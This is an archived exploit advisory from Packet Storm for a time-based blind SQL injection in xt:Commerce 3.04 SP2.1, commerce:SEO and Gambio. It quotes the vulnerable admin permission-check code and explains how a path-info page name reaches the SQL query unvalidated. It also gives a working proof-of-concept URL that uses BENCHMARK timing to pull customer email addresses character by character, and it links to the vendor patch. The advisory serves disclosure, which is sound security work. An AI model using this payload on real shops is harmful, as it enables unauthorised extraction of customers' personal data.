exploit the possibilities

xt:Commerce 3.04 SP2.1 Blind SQL Injection

xt:Commerce 3.04 SP2.1 Blind SQL Injection
Posted Aug 16, 2012
Authored by Ralf Zimmermann

xt:Commerce versions 3.04 SP2.1 and below suffer from a time based blind SQL injection vulnerability.

tags | exploit, sql injection
MD5 | 465c373bb70f652c9883216edb1b06a2

xt:Commerce 3.04 SP2.1 Blind SQL Injection

Change Mirror Download
+---------------------------------+
| xt:Commerce <= v3.04 SP2.1 |
| commerce:SEO <= v2.1 CE |
| Gambio <= v2.0.10 SP1.4 |
| Time Based Blind SQL Injection |
+---------------------------------+

Author.............: Ralf Zimmermann
Mail...............: info[AT]stoffline.com
Vendor Homepage....: http://www.xt-commerce.com/
Software Link......: http://www.xtc-load.de/2008/07/xtcommerce-v304-sp21/
Affected Version...: xt:Commerce <= v3.04 SP2.1, commerce:SEO <= v2.1 CE, Gambio <= v2.0.10 SP1.4
URL http://stoffline.com/golb/details-zur-sicherheitslucke-in-xtcommerce/ (german)
URL http://stoffline.com/golb/sicherheitslucke-in-xtcommerce/ (german)
Date...............: 12/06/2012

-----------------------------------------------------------
Author will be not responsible for any damage.
-----------------------------------------------------------
I. DESCRIPTION
-----------------------------------------------------------

# we need to be logged in as a regular customer...

admin/backup.php
18: require('includes/application_top.php');

admin/includes/application_top.php
399: $current_page = split('\?', basename($_SERVER['PHP_SELF'])); $current_page = $current_page[0]; // for BadBlue(Win32) webserver compatibility
# if you go to
# http://127.0.0.1/xtc_304SP21/admin/backup.php/test.php?
# $current_page = 'test.php' instead of 'backup.php' cause AcceptPathInfo from Apache passes the entire path

486: $pagename = strtok($current_page, '.');
# $pagename = 'test';

487: if (!isset($_SESSION['customer_id'])) {
488: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
489: }
# We need to be logged in but we walk through this checkpoint regardless of our customer status

491: if (xtc_check_permission($pagename) == '0') {
492: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
493: }

admin/includes/functions/general.php
110: function xtc_check_permission($pagename) {
111: if ($pagename != 'index') {
112: $access_permission_query = xtc_db_query("select ".$pagename." from ".TABLE_ADMIN_ACCESS." where customers_id = '".$_SESSION['customer_id']."'");
113: $access_permission = xtc_db_fetch_array($access_permission_query);
114:
115: if (($_SESSION['customers_status']['customers_status_id'] == '0')&& ($access_permission[$pagename] == '1')) {
116: return true;
117: } else {
118: return false;
119: }
120: } else {
121: xtc_redirect(xtc_href_link(FILENAME_LOGIN));
122: }
123: }
# $pagename comes in the query with no validation
# select test from admin_access where customer_id = 2

# Every valid SQL query ends with a redirect to the login page.
# We can use time based MySQL commands like Benchmark to exploit the vulnerability.
# The PoC checks if the first character from the customers email adress is 'a'.
# If so, the query will consume a lot of time e.G. 10 seconds, if not, we will directly redirected to the login page

-----------------------------------------------------------

II. PoC EXPLOIT
-----------------------------------------------------------
http://127.0.0.1/xtc_304SP21/admin/backup.php/IF((SELECT%20ASCII(SUBSTR(customers_email_address,1,1))%20FROM%20customers%20WHERE%20customers_id=1)=97,BENCHMARK(100000000,MD5(1)),1)--%20.php?
-----------------------------------------------------------

III. Solution:
-----------------------------------------------------------
Patches can be found here:
http://www.xtc-load.de/2012/06/wichtiges-security-update-fur-alle-xtc-forks/
-----------------------------------------------------------

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close